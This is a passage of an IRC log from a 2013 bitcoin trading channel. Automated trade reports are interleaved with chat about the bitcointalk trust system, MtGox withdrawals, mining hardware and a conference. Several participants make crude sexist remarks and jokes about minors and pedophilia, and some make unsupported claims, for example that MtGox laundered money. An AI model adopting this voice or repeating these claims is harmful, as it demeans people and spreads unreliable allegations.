no? May 22 13:06:22 [BTCTC] [ASICMINER-PT] 1 @ 2.6001 BTC [+] May 22 13:06:23 mjr_, yeah, but there's pretty much zero development. May 22 13:06:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.027799 = 0.0834 BTC [-] May 22 13:08:40 [BTCTC] [ASICMINER-PT] 1 @ 2.699898 BTC [+] May 22 13:08:58 [BTCTC] [ASICMINER-PT] 1 @ 2.699898 BTC [+] May 22 13:09:32 [BTCTC] [ASICMINER-PT] 1 @ 2.699898 BTC [+] May 22 13:09:46 [BTCTC] [ASICMINER-PT] 5 @ 2.699898 = 13.4995 BTC [+] May 22 13:10:10 [BTCTC] [ASICMINER-PT] 3 @ 2.699898 = 8.0997 BTC [+] May 22 13:10:18 [BTCTC] [ASICMINER-PT] 1 @ 2.699898 BTC [+] May 22 13:10:28 http://arstechnica.com/apple/2013/05/tim-cook-tells-congress-why-apple-wont-move-100-billion-back-home/ May 22 13:10:32 my heroes May 22 13:10:49 yeah, why pay taxes? tax avoidance is the correct thing to do May 22 13:10:51 [BTCTC] [ASICMINER-PT] 3 @ 2.699898 = 8.0997 BTC [+] May 22 13:10:56 congress just jelly May 22 13:11:48 there are people actively working on litecoin and namecoin? litecoins yes, namecoin im not so sure May 22 13:12:21 mjr_, yeah, but there's pretty much zero development. not true, ltc is just avoind the fuck ups btc ran into and will avoid the bad database thing and not get forked May 22 13:12:39 you will see a major release soon as we are done testing May 22 13:13:02 yes we tested longer and harder than the btc people do... May 22 13:14:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.027799 = 0.1946 BTC [-] May 22 13:15:10 [BTCTC] [TAT.ASICMINER] 17 @ 0.027007 = 0.4591 BTC [-] May 22 13:15:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.027006 BTC [-] May 22 13:15:18 [BTCTC] [TAT.ASICMINER] 100 @ 0.027004 = 2.7004 BTC [-] May 22 13:15:22 [BTCTC] [TAT.ASICMINER] 100 @ 0.027003 = 2.7003 BTC [-] May 22 13:15:28 [BTCTC] [TAT.ASICMINER] 100 @ 0.027001 = 2.7001 BTC [-] May 22 13:16:12 [BTCTC] [ASICMINER-PT] 1 @ 2.698999 BTC [-] May 22 13:17:13 [BTCTC] [ASICMINER-PT] 2 @ 2.698999 = 5.398 BTC [-] May 22 13:20:07 TradeFortress hey, you involved wiuth the new trust thing on btctalk ? May 22 13:20:17 Chaang-Noi!*@* added to ignore list. May 22 13:20:36 Involved as in theymos trusted me, and because of the way it works my feedback is shown by default May 22 13:20:45 but you didn't code it or anything ? May 22 13:20:49 Nope May 22 13:20:55 do you know who did ? May 22 13:20:59 Other user's feedback aren't shown by default. theymos did obviously May 22 13:21:15 a ok. do you know how it's implemented or is it documented anywhere ? May 22 13:21:18 while not escaping user inputs, leading to a XSS where some attacker can steal his session May 22 13:21:27 lmao what. May 22 13:21:33 Chaang-Noi, only "trusted" feedback May 22 13:21:47 If I rate someone, it shows up as +1 or what, if smoothie rates someone it doesn't count May 22 13:21:58 But you can trust smoothie for example and then smoothie's feedback will count May 22 13:22:15 so basically it actually works like the wot. May 22 13:22:30 Pretty much. No global scores, which forces people to not look at the sum and actually at individual ratings May 22 13:22:37 there's also the difference where instead of score it's based on risked btc May 22 13:22:47 wait i thought that what it was, a global score ? as in 0/-0 we May 22 13:22:52 did i misunderstand that line ? May 22 13:22:57 also dub you copyin' May 22 13:22:59 this ? May 22 13:23:15 There is the "default" score. If you trust no one (which you do at first), you trust theymos May 22 13:23:24 and because it's a web, people who theymos trusts's feedback matter. May 22 13:23:38 and people who theymos trusted's trusted people matter. only up to this level unless you change yoru setting. May 22 13:23:46 You can build your own web of trust, and see different scores to other people. May 22 13:23:59 yeah. but what it displays is the actual sum total of trust ratings May 22 13:24:26 the actual Trust: number is some weird undisclosed algorithm that takes in account risked BTCs, age and whatever May 22 13:24:59 uh. May 22 13:25:04 so basically secret sauce ? May 22 13:25:24 age? May 22 13:25:25 http://www.bitcoinpoker.org/news/us-department-of-treasury-targets-bitcoin-poker-sites/ May 22 13:25:27 age of feedback May 22 13:25:33 oh wow May 22 13:25:34 oh lol May 22 13:25:37 somebody should tell that fucktard he's completely misread the fincen clarification May 22 13:25:40 if he even actually read it. May 22 13:26:00 ^^ May 22 13:26:24 [MPEX] [S.MPOE] 18100 @ 0.00067441 = 12.2068 BTC [-] May 22 13:26:27 [MPEX] [S.MPOE] 7600 @ 0.00067354 = 5.1189 BTC [-] May 22 13:26:58 http://www.forbes.com/sites/jonmatonis/2013/05/20/bitcoin-comes-to-swift/ May 22 13:27:06 ^ interesting May 22 13:27:09 [BTCTC] [ASICMINER-PT] 1 @ 2.600001 BTC [-] May 22 13:27:17 " An administrator or exchanger is not a provider or seller of prepaid access, or a dealer in foreign exchange, under FinCEN's regulations." May 22 13:27:19 duh. May 22 13:27:50 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] May 22 13:27:52 mircea_popescu, through lots of people have came to lots of different conclusions. typical doublespeak stuff. May 22 13:27:54 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [-] May 22 13:28:10 TradeFortress yeah, but lots of people of this sort : http://trilema.com/2013/youre-the-guy-who-wasnt-good-enough-to-sling-dope/ May 22 13:28:30 [BTCTC] [TAT.ASICMINER] 30 @ 0.027249 = 0.8175 BTC [+] May 22 13:28:41 anyway, so back to the trust thing on bitcointalk (i'm trying to discern if i'm going to add using it to the girl's workload) May 22 13:28:53 is there some way to actually check the web of trust behind the rating ? May 22 13:28:57 (ie, who trusted who, something like May 22 13:29:01 ;;gettrust TradeFortress May 22 13:29:02 Trust relationship from user mircea_popescu to user TradeFortress: Level 1: 0, Level 2: 0 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=TradeFortress May 22 13:29:07 yeah, here https://bitcointalk.org/index.php?action=trust;u=67058 May 22 13:29:08 like that graph May 22 13:29:19 no graphs but I requested that May 22 13:29:34 i don't have an acct. pastebin that page please ? May 22 13:30:02 lol, funny thing is you used to get a database error if you tride to access that page without logging in May 22 13:30:41 here's what it looks like http://i.imgur.com/g0UtCBL.png May 22 13:31:57 On forum posts, those with a positive trust rating has a green color, and those with a negative rating gets a red warning. May 22 13:32:02 [BTCTC] [ASICMINER-PT] 2 @ 2.6 = 5.2 BTC [-] May 22 13:32:10 well the one thing they did right is they took away the [1,10] cruft May 22 13:32:11 nanotube ^ May 22 13:32:17 (you saw this ?) May 22 13:32:47 TradeFortress but positive/negative to your account so diff people see diff coloring ? May 22 13:34:11 correct May 22 13:34:28 95% of forum users won't change defaults through, so there is kinda a global rating. May 22 13:34:54 i guess so. how deep does it go ? 3 ? May 22 13:35:21 default 2 (actually 3), you can set 0-3 May 22 13:35:27 Anyone have any experience with http://coinlenders.com/interest May 22 13:35:35 KRS-1, hey, I run coinlenders. May 22 13:35:39 lol 0-3 so 2 is 3 mkay. theymos is so weird in places. May 22 13:35:45 =D I was checking out your site May 22 13:35:52 anyway, if it's 3 it will diverge rapidly, there won't really be a global rating. May 22 13:36:07 I am reviewing for possible investment May 22 13:36:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.026801 BTC [-] May 22 13:36:17 [BTCTC] [TAT.ASICMINER] 19 @ 0.026502 = 0.5035 BTC [-] May 22 13:36:20 mircea_popescu, but for people who don't change defaults there's just one rating May 22 13:36:34 [BTCTC] [TAT.ASICMINER] 41 @ 0.026502 = 1.0866 BTC [-] May 22 13:36:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.026501 BTC [-] May 22 13:36:46 no, because even if they trust theymos' tree by default, just bvy adding a couple other users they get very diff end results May 22 13:36:52 [BTCTC] [TAT.ASICMINER] 100 @ 0.0265 = 2.65 BTC [-] May 22 13:37:06 mircea_popescu, that's true, I was referring to the people who would leave everything as defaults May 22 13:37:13 and if you trust anyone you no longer trust theymos by default. May 22 13:37:22 i think pretty much everyone trust's nanotube tree by defgault in wot and still there's muich variance and no true global. May 22 13:37:28 o really ? May 22 13:37:45 this is actually a pretty smart way to go about it. May 22 13:37:55 assuming that people actually use it May 22 13:38:12 so far the only default ratings are me or people I trusted :P May 22 13:38:17 [BTCTC] [ASICMINER-PT] 1 @ 2.675999 BTC [+] May 22 13:38:19 [BTCTC] [ASICMINER-PT] 1 @ 2.676 BTC [+] May 22 13:38:25 okay, i[m going to get the girl to do it. May 22 13:38:36 i don't see anything massively wrong with it tbh. May 22 13:39:55 Well, is she going to leave negative feedback (which would result in a giant red warning on people's posts) for inaba/josh and such May 22 13:40:24 i'm still working out the rules. i see there's a reference field, which is nice. May 22 13:40:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.0265 = 0.53 BTC [-] May 22 13:40:41 and since you can introduce 0 btc as risked i think i'm going to make it be something like this : May 22 13:40:55 [BTCTC] [BITVPS] 3 @ 0.00075 = 0.0023 BTC [-] May 22 13:41:14 go back through her posting history, -1 everyone "starting up" dumbass businesses she had to drop a see here post to, linking to that post May 22 13:41:21 -1 everyone on the immense scammer list May 22 13:41:31 then +1 the few people who actually aren't idiots in there May 22 13:41:41 can't -1, it's positive feedback or scammer (-4) May 22 13:41:52 all this on 0 btc because it's not a trading acct. May 22 13:41:56 you see a problem with that plan ? May 22 13:42:22 yes, I might lose my default trust status if theymos doesn't like it May 22 13:42:34 well, that's vague. May 22 13:44:02 I think it's supposed to be actually scamming May 22 13:44:21 so then how'd she rate josh, i never bought bfl crud. May 22 13:44:29 [BTCTC] [ASICMINER-PT] 1 @ 2.600001 BTC [-] May 22 13:45:24 [BTCTC] [S.DICE-PT] 4 @ 0.002557 = 0.0102 BTC [-] May 22 13:45:36 I should probably make a post in the donators section about it May 22 13:45:50 meanwhile back at the ranch May 22 13:45:51 MPOE-PR um did they nix their system already? trust stuff no longer shows up under ppls names May 22 13:45:51 you logged in ? May 22 13:45:51 MPOE-PR yep May 22 13:45:51 MPOE-PR nothin' related in profile links.... May 22 13:45:51 hm May 22 13:46:14 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] May 22 13:46:37 but anyway : i don't see any serious flaw in it, have the guy explain exactly wtf he wants it to be used as or w/e. May 22 13:46:38 only in the marketplace section May 22 13:46:48 does trust show up. and in PMs apparently May 22 13:47:03 a, so it's not really for the forum May 22 13:47:15 https://bitcointalk.org/index.php?topic=212382.0 << that's in marketplace neh ? May 22 13:47:22 yes May 22 13:48:16 https://bitcointalk.org/trust.php May 22 13:48:21 this is cute lol. i get a 0. May 22 13:48:48 anyway, i take it this is mostly still being worked on. May 22 13:48:58 [BTCTC] [TAT.ASICMINER] 35 @ 0.0272 = 0.952 BTC [+] May 22 13:49:03 that is your user ID heh May 22 13:49:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.027248 = 0.1635 BTC [+] May 22 13:59:08 any questions on coinlenders btw? May 22 13:59:56 not really..i'm looking for some folks who have used it before. May 22 14:00:02 [HAVELOCK] [HIM] 2 @ 2.5 = 5 BTC [+] May 22 14:00:04 http://trilema.com/2013/the-conference-second-edition/#VIP-list May 22 14:00:10 conference list got teh first update. May 22 14:00:11 to be honest i am also seeking some investment advice May 22 14:00:20 [BTCTC] [ASICMINER-PT] 4 @ 2.6 = 10.4 BTC [-] May 22 14:00:23 so i have some additional homework to do first anyway May 22 14:00:28 TradeFortress what is it, like your private bond offering ? May 22 14:00:31 what other sites do you use May 22 14:00:33 i mean run May 22 14:01:05 mircea_popescu, pretty much. variable interest rates || fixed term ones May 22 14:01:18 by the way, next time you pull a caper a la ripple May 22 14:01:29 insert some fucking disclaimers in the text of the damned thing May 22 14:01:43 [MPEX] [S.MPOE] 5752 @ 0.00067354 = 3.8742 BTC [-] May 22 14:01:45 [MPEX] [S.MPOE] 1979 @ 0.00067309 = 1.332 BTC [-] May 22 14:02:15 yeah. May 22 14:02:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.026999 = 0.405 BTC [-] May 22 14:03:11 there's nothing wrong with making a proof of concept, but the average person with an actual college degree and no prior experience of anything bitcoin should be able to understand from the very text what the score is. May 22 14:03:33 this makes the difference from an actual scam. May 22 14:04:47 in hindsight, I should have wrote 1.01 in the screenshot May 22 14:05:21 so people'd lose 0.01 BTC at max. I'm still going to get people posting scam accusations, and that webr3 guy May 22 14:05:54 the most cogent argument that can be brought is that such stuff will turn off people we actually want/need based on what's fundamentally a misunderstanding May 22 14:06:24 it's okay to punish stupidity, especially if wilful. it's not okay to abuse honest misunderstandings. May 22 14:06:50 Pretty good way to put it. May 22 14:07:04 anyway. you know about my conference next year ? May 22 14:07:48 [BTCTC] [ASICMINER-PT] 1 @ 2.600201 BTC [+] May 22 14:08:40 [BTCTC] [ASICMINER-PT] 1 @ 2.6002 BTC [-] May 22 14:09:18 yeah, looked at it May 22 14:09:30 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [+] May 22 14:09:35 [BTCTC] [ASICMINER-PT] 5 @ 2.6 = 13 BTC [-] May 22 14:09:42 you need to bring cute Romanian girls in bikinis..That would be leet and make for hawt pics for #bitcoin-anal May 22 14:10:01 [HAVELOCK] [SDICE] 15 @ 0.221 = 3.315 BTC [+] May 22 14:10:17 that channel better not exist *clicks* May 22 14:10:29 [BTCTC] [ASICMINER-PT] 3 @ 2.60001 = 7.8 BTC [+] May 22 14:11:17 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] May 22 14:11:44 its on the record that certain Fortresses visited the annals of Bitcoin. May 22 14:11:44 TradeFortress i own it. May 22 14:11:53 KRS-1 likely actually. May 22 14:12:11 i really despise the sausage fests bitcoin conferences are. who da fuck wants to hang out witha buncha doods. May 22 14:12:13 lmao that is bad ass May 22 14:12:28 hahaha May 22 14:12:34 makomk malaimo metabyte midnightmagic MiningBuddy mircea_popescu mjr_ mod6 mpexbot May 22 14:12:36 other than mjr_ of course. May 22 14:13:14 yeah that is my biggest pain in the ass..i go to some clubs and its a sausage party but my friends be like..hang on man we just got here and I have to remind them to look around. Sometimes South Florida is so hit or miss like that makes me thing the male/female ratio is off but it rly isnt. May 22 14:13:59 well most women aren't particularly interested in going to clubs May 22 14:14:02 [HAVELOCK] [ASICM] 20 @ 0.02695 = 0.539 BTC [+] May 22 14:14:03 [HAVELOCK] [ASICM] 91 @ 0.0275 = 2.5025 BTC [+] May 22 14:14:03 [HAVELOCK] [ASICM] 10 @ 0.02759 = 0.2759 BTC [+] May 22 14:14:05 which may be due to most clubs being retarded May 22 14:14:08 mircea_popescu, I might come but it's 1 year ahead . maybe. May 22 14:14:24 TradeFortress yea. some people actually need 1 year lead time. May 22 14:14:41 but reg is open till early next year so. May 22 14:14:52 LOL image May 22 14:14:52 In the middle with the beard is MPOE-PR. May 22 14:15:08 heh May 22 14:15:59 the kind of women im interested in are interested in going to clubs May 22 14:16:21 kind that are barely old enough to drink May 22 14:16:37 ... why are you interested in 12 yos ?! May 22 14:16:40 perv. May 22 14:16:51 lmao is that the drinking age in Romania? Its 21 here in the U.S. May 22 14:17:11 ya well we don't do that entire iran thing in europe. May 22 14:18:01 You can keep the Mid East womens..i think women from the Mid East are the last on the list when it comes to good looks and hot bodies. May 22 14:18:30 persians can be pretty hot May 22 14:18:33 I gotta make it out to Japan someday, they got that whole hello kitty thing going on there. Plus I'm big in Japan. May 22 14:18:38 persian chicks are very hot. May 22 14:18:56 and joo girls are often redhaired May 22 14:19:07 rly ..i shall have to check for persian womens sites. May 22 14:19:51 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 22 14:19:52 persia is where it all begun. May 22 14:19:57 fruit trees come from there, May 22 14:19:59 roses come from there May 22 14:20:01 cows come from there May 22 14:20:04 women come from there May 22 14:20:08 it's ground zero. May 22 14:24:59 my nephew dated a persian girl..which is very out of the ordinary for where we live May 22 14:25:31 someone made a nice client for coinchat. http://chromaticcreative.net/bitcoin/moobot/flatapp.php May 22 14:27:23 KRS-1 why, you don't date around there ? May 22 14:27:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.027997 = 0.224 BTC [+] May 22 14:29:22 I think I'm going to build a cumulative depth chart for the BTC-TC securities May 22 14:29:22 sure i do, there is a good mix of other ethnicities May 22 14:30:01 im just picky to tall females with B+ breasts, blonde hair and young (college girl) looks May 22 14:30:01 [HAVELOCK] [HIM] 1 @ 2.5 BTC [+] May 22 14:30:05 Similar to bitcoinity's chart for MtGox May 22 14:30:14 some peole say im too picky May 22 14:30:20 B+? meh. May 22 14:30:22 C+ kthx May 22 14:30:29 anything more than a handfull is a waste May 22 14:30:56 says the pedo. May 22 14:31:13 parseval, you mean with change bars and such May 22 14:31:43 Well, the change bars will be difficult, I'll start with the plotlines May 22 14:32:21 I don't store the data historically, and only poll the API every 10 minutes or so to be a friendly API consumer May 22 14:33:12 But yeah, that V chart is the cumulative depth chart May 22 14:33:30 But isn't there already one.. May 22 14:34:37 Yeah, there is, but I think I can expand on it a bit with some tooltips to say exactly how many units need to be sold to drop the price down to a certain level May 22 14:35:16 [MPEX] [S.MPOE] 20450 @ 0.00067161 = 13.7344 BTC [-] May 22 14:35:21 [MPEX] [S.MPOE] 6150 @ 0.00066987 = 4.1197 BTC [-] May 22 14:35:21 Besides, I already have another chart, so a depth graph would look nice underneath it.. eg http://coinflow.co/chart/ASICMINER-PT May 22 14:36:44 oh, looks pretty nice. better than flot or whatever btct.co is currently using May 22 14:37:31 Thanks. I've got all of the assets built into that site, if you are interested then check the Asset Listing dropdown for others May 22 14:38:20 harass ukto for bitfunder API May 22 14:38:41 Yeah, I asked in the IRC once but he wasn't there at the time. I need to be more persistent May 22 14:39:27 I'd love to get charts for both of them, mpex too if possible at some point without paying 30 BTC for data access May 22 14:40:01 [MPEX] [S.DICE] 500 @ 0.00200004 = 1 BTC [-] May 22 14:40:03 [MPEX] [S.DICE] 2498 @ 0.00200003 = 4.9961 BTC [-] May 22 14:40:06 [MPEX] [S.DICE] 423 @ 0.00200002 = 0.846 BTC [-] May 22 14:40:09 [MPEX] [S.DICE] 579 @ 0.002 = 1.158 BTC [-] May 22 14:45:35 Autos would be heaps easier for 4wding May 22 14:45:38 manual would be better in all cases..stay away from the luxury models, the more simple utilitarian models are the best for durability and survival. the "nice" ones arent worth a crap May 22 14:46:31 i'd rather own an older model toyota if i had to survive. May 22 14:46:48 Haha well thats my opinion, been 4wding in a manual and it was a pain in the ass (although i was still learning manual) May 22 14:46:49 lol nice..car salesmen would do anything for a sale here in the 'states May 22 14:47:20 0.o May 22 14:47:32 one thing to look for is a real locking differential not "all wheel drive" but true 4X4 and preferably a full axle up front not independent May 22 14:47:37 I had a jeep for 5 or so years May 22 14:47:43 I used the 4WD once May 22 14:48:11 its what we do where i live =D I have a diesel 2006 Ford F250 4X4 but its not the best for off road, will it get the job done? hell yes but not the best May 22 14:49:25 thats awesome May 22 14:49:44 automatics arent bad, but i wouldnt want to depend on them, plus they run hotter, they need to be cooled you know May 22 14:50:53 I think manual is more fun anyway May 22 14:50:53 Driving a manual is usually more fun :P May 22 14:50:58 lol May 22 14:51:13 * Freenode announcement * The topic is now baseball. May 22 14:51:46 Nice :D May 22 15:03:01 [HAVELOCK] [ASICM] 16 @ 0.02759 = 0.4414 BTC [+] May 22 15:05:16 jurov >>> https://bitcointalk.org/index.php?topic=212761.msg2233480#msg2233480 May 22 15:05:41 Chaang-Noi: get the manual May 22 15:06:18 ThickAsThieves: so i should search some proof some months ago. so nice of you. May 22 15:06:42 ThickAsThieves link to the proof ? May 22 15:06:59 TradeFortress: how do i actually rate an user? i fail to find anything in profile or wherever May 22 15:07:37 jurov, in a marketplace post, you click on the "Trust:" link May 22 15:07:49 I'll trust you first so it'll actually show up May 22 15:09:11 jurov, what's your userid (https://bitcointalk.org/trust.php) May 22 15:10:34 Chaang-Noi: 6 cyl manual.. what's the problem? I would never buy a 4 dr jeep, but maybe you have a family.. i dunno. May 22 15:11:17 TradeFortress: my id is 51125 . and i'm trying to rate mpoe-pr,. always get db error May 22 15:11:18 ah, so it's perfect! May 22 15:11:30 lol db error May 22 15:11:34 what are you trying to do? May 22 15:11:37 it was discussed in channel May 22 15:11:43 but I'll dig it up May 22 15:11:45 maybe i'm overstepping maximal btc amount, what is it? May 22 15:11:52 i hear you, I figured it would be easier to find them over there. May 22 15:11:52 1e+16 May 22 15:11:57 something like that May 22 15:12:03 Chaang-Noi: I didn't see you at the conference! May 22 15:12:16 k jurov your ratings now show up to people with default settings May 22 15:12:47 Luke-Jr he probably wasn't in the bfl booth ? May 22 15:13:11 bfl were brave to show their faces there May 22 15:13:17 did anyone hit them up for their unit? May 22 15:13:32 just some fans. May 22 15:14:08 i was kinda curious to see if teh community organises something like the nobel prize awarding, but with quarters instead of pens May 22 15:14:08 BitHub: me, gigavps, and another guy were arguing over who gets which one May 22 15:14:10 :P May 22 15:14:17 just walk up to josh leave a quarter on his table May 22 15:14:25 "you've been voted most idiotic thing of 2012" May 22 15:14:52 i wonder if they were taking preorders at the conference May 22 15:15:10 jurov, mp >>> https://bitcointalk.org/index.php?topic=80312.msg1834765#msg1834765 May 22 15:15:31 I didn't also list BTC/USD rates within the post May 22 15:15:40 but as you recall, the time frame was up up up May 22 15:15:43 yeah May 22 15:16:00 yeah that's pretty good evidence really. May 22 15:17:13 you should share the love Luke-Jr May 22 15:17:38 using the bfl that butterfly labs gave you to buy asicminer gear isn't very ethical May 22 15:17:42 BitHub: they weren't May 22 15:18:13 BitHub: BFL gave me something? May 22 15:18:56 oh, you mean the 5% of my paid-in-full year-old order? May 22 15:19:12 that has been offline for the past week.. :/ May 22 15:19:37 true what happened? btw what do you think of the BFL hardware wallets? May 22 15:19:40 Chaang-Noi: dunno, something happened to it May 22 15:19:49 it doesnt work May 22 15:19:53 BitHub: those seem pretty sweet May 22 15:20:01 [HAVELOCK] [ASICM] 2 @ 0.02768 = 0.0554 BTC [+] May 22 15:20:02 Chaang-Noi: Sonny didn't elaborate. May 22 15:20:02 [HAVELOCK] [ASICM] 12 @ 0.0275 = 0.33 BTC [-] May 22 15:20:24 any idea when they'll be ready? id like to preorder like 100 but don't want to wait a few years for them May 22 15:20:25 Chaang-Noi: but hey, it *was* abusing the power supply.. May 22 15:20:44 BitHub: not sure May 22 15:20:44 they need to mine 1k btc quickly for chairty May 22 15:20:59 ThickAsThieves: I can argue that if you exclude whalespotting between dec 2012 and march 2013 the sd picture isn't so clear May 22 15:21:01 [HAVELOCK] [ASICM] 13 @ 0.0275 = 0.3575 BTC [-] May 22 15:21:02 [HAVELOCK] [ASICM] 32 @ 0.0269 = 0.8608 BTC [-] May 22 15:21:03 [HAVELOCK] [ASICM] 27 @ 0.026501 = 0.7155 BTC [-] May 22 15:21:05 [HAVELOCK] [ASICM] 1 @ 0.0265 BTC [-] May 22 15:21:06 [HAVELOCK] [ASICM] 226 @ 0.0265 = 5.989 BTC [-] May 22 15:21:07 [HAVELOCK] [ASICM] 1 @ 0.026 BTC [-] May 22 15:21:13 I can't say I'm surprised if it just died May 22 15:21:29 anyhow, I don't see how spending the income from that on other ASICs is in any way bad May 22 15:21:40 not that I have done that yet either May 22 15:21:49 jurov, I could argue the whale went away due to BTC/USD rate May 22 15:21:51 but I certainly would if ASICMiner prices were reasonable May 22 15:22:24 like 75 n stuff May 22 15:22:30 50btc still high? May 22 15:22:38 BitHub: yeah, for 10 Gh/s May 22 15:22:56 I should have tried to talk Yifu into selling me the Avalon he had with him… May 22 15:23:17 Chaang-Noi: well, you have a point there I guess May 22 15:23:21 Chaaang-Noi why no free usb for OG shareholders? May 22 15:23:31 Hello May 22 15:23:43 BitHub: only for the big shareholders I think May 22 15:23:52 the ones with the super-secret ML access May 22 15:23:56 jurov well it'd be worth seeing the numbers perhaps May 22 15:24:12 lulz, yeah alot of secret May 22 15:24:14 ThickAsThieves seems unlikely the whale is muchly fiat influenced. you think he bought his stash ? May 22 15:24:30 mp, no I think he sold it May 22 15:24:36 I presume the divs haven't been announced yet6. May 22 15:24:48 2 hours or so May 22 15:25:07 I wonder when ASICMiner will stop spamming me with dust May 22 15:25:51 funny asicminer ignore all my emails, till i send them one saying i got 450 preorders May 22 15:25:55 yes May 22 15:25:57 yeah they really care about share holders May 22 15:26:01 WILLdude: I know at your age the time goes several time slower, but try not to ask the same things every day... May 22 15:26:39 well my questions were about selling to the australian market place May 22 15:26:42 Haha soz May 22 15:27:02 It wasn't really a question. May 22 15:27:08 More of a presumption. May 22 15:27:21 i could have had 1000 + preorders if they bothered to answer me a month ago when they first announce the usb's May 22 15:27:40 ThickAsThieves ah now that's a good point yes May 22 15:28:15 does someone here use international wire to withdraw from mtgox? May 22 15:28:49 is there an upper bound on costs through intermediate banks etc. ? May 22 15:29:15 a wire costs about $50 or so May 22 15:29:17 ballpark figure May 22 15:29:41 b0n1: MtGox -> USAA costs about $30 May 22 15:29:45 the bank of mtgox takes 2000 YEN that are around 20 $ May 22 15:30:02 that's crazy May 22 15:30:21 I raised my limits to $10k, so $30 isn't so much May 22 15:30:25 compared to 1% SEPA, its really good price for high amount of withdrawal May 22 15:30:29 yes May 22 15:30:31 :) May 22 15:30:43 b0ni: you should be worried about time upper bound instead... i recommend to sell the bitcoins elsewhere or locally instead May 22 15:30:59 i miss mtgox codes May 22 15:31:01 of potentially waiting month or so for mtgox May 22 15:31:02 it says international wire 2-5 business days jurov May 22 15:31:02 MtGox->USAA takes at most 3 days or so May 22 15:31:09 Who am I kidding? I think I'll sell my bitcoins and get a life. May 22 15:31:11 usually 1 or 2 May 22 15:31:34 2-5 business days hahahahah... i had sepa withdrawals taken 2 weeks May 22 15:31:44 and that was before mtgox was cool May 22 15:31:48 WILLdude what are you trying to accomplish ? May 22 15:31:48 yeah SEPA is huge atm May 22 15:32:02 but international wire should still be fast May 22 15:32:05 jurov they always were slow with sepa because basically they had to launder money to do it. May 22 15:32:21 and intl wire needs not be laundered? May 22 15:32:28 i learn every day May 22 15:32:39 IDK May 22 15:32:42 i think they can send a wire from their japan bank May 22 15:32:51 but sepa transfers obviously you need to send from a sepa bank May 22 15:32:56 Not being an immature git I think. May 22 15:33:00 so therefore someone had to interface all this May 22 15:33:07 *arrogant May 22 15:33:17 WILLdude that's ok, you can do that with or w/o bitcoins equally well May 22 15:33:42 Not sure. May 22 15:34:20 Luke-Jr, was it easy to raise limits? is there anything i have to take care of when i send those guys some data of myself? May 22 15:34:51 b0n1: it wasn't too bad, but I took my time going through it May 22 15:34:55 wasn't in a hurry May 22 15:35:06 I hear there's a long line for verification crap now May 22 15:35:23 even if you are already verified the usual way? May 22 15:37:05 mircea_popescu: you remember these poor canadians than got reply from mtogx after a month "sry, we have no money"? May 22 15:37:05 oh May 22 15:37:07 then you just ask May 22 15:37:21 jurov yes. May 22 15:37:24 its not just sepa, it's lameness worldwide May 22 15:37:27 thar was last month May 22 15:38:26 Luke-Jr, so you raised your daily limit to 10k ? did i get this right? May 22 15:38:36 b0n1: right May 22 15:38:45 monthly is still 50k I think May 22 15:38:52 okay May 22 15:39:02 usually monthly is 10 k as i read May 22 15:39:12 well, as opposed to 31x 10k May 22 15:40:01 did you ask to higher that even more? May 22 15:40:35 say 100k every month May 22 15:41:19 then you need to do the pain-in-the-butt id stuff May 22 15:41:42 oh? May 22 15:41:44 so here's a refresher : Chase Manhattan has paid 16bn in litigation costs since 2009 May 22 15:41:49 that's about 15% of their profit. May 22 15:42:43 ;) May 22 15:43:25 do i have to take care on any account ban when i do transfers > 10k a day? May 22 15:43:35 to mtgox May 22 15:43:59 as long as you are wiring in you'll be fine. May 22 15:44:11 don't expect any of it back in any shape or form and you'll be even better. May 22 15:44:54 hm actually i would mostly wire out May 22 15:50:54 [MPEX] [S.MPOE] 5950 @ 0.00066873 = 3.9789 BTC [-] May 22 15:53:24 ;;ticker May 22 15:53:25 BTCUSD ticker | Best bid: 123.20000, Best ask: 123.29998, Bid-ask spread: 0.09998, Last trade: 123.20000, 24 hour volume: 17394.54080216, 24 hour low: 121.33330, 24 hour high: 123.70000, 24 hour vwap: 122.60206 May 22 15:57:23 [MPEX] [S.DICE] 500 @ 0.00251996 = 1.26 BTC [+] May 22 15:57:27 [MPEX] [S.DICE] 1365 @ 0.00251997 = 3.4398 BTC [+] May 22 15:57:29 [MPEX] [S.DICE] 1200 @ 0.00251998 = 3.024 BTC [+] May 22 15:57:43 [MPEX] [S.DICE] 500 @ 0.00251999 = 1.26 BTC [+] May 22 15:57:45 [MPEX] [S.DICE] 4435 @ 0.00252 = 11.1762 BTC [+] May 22 16:01:42 [MPEX] [S.MPOE] 3900 @ 0.00067199 = 2.6208 BTC [+] May 22 16:10:02 [HAVELOCK] [ASICM] 32 @ 0.0272 = 0.8704 BTC [+] May 22 16:15:05 [HAVELOCK] [ASICM] 27 @ 0.0272999 = 0.7371 BTC [+] May 22 16:15:06 [HAVELOCK] [ASICM] 8 @ 0.027395 = 0.2192 BTC [+] May 22 16:29:00 [HAVELOCK] [ASICM] 3 @ 0.027395 = 0.0822 BTC [+] May 22 16:34:01 [HAVELOCK] [ASICM] 18 @ 0.027395 = 0.4931 BTC [+] May 22 16:44:08 burnside: scary http://o7.no/10lU9mL May 22 16:54:01 [HAVELOCK] [ASICM] 8 @ 0.027395 = 0.2192 BTC [+] May 22 16:57:02 [HAVELOCK] [ASICM] 275 @ 0.027395 = 7.5336 BTC [+] May 22 16:59:01 [HAVELOCK] [ASICM] 33 @ 0.0275 = 0.9075 BTC [+] May 22 17:00:02 [HAVELOCK] [ASICM] 226 @ 0.0275 = 6.215 BTC [+] May 22 17:05:01 [HAVELOCK] [ASICM] 3 @ 0.0275 = 0.0825 BTC [+] May 22 17:11:58 [BTCTC] [TAT.ASICMINER] 35 @ 0.02701 = 0.9454 BTC [-] May 22 17:12:53 [BTCTC] [TAT.ASICMINER] 10 @ 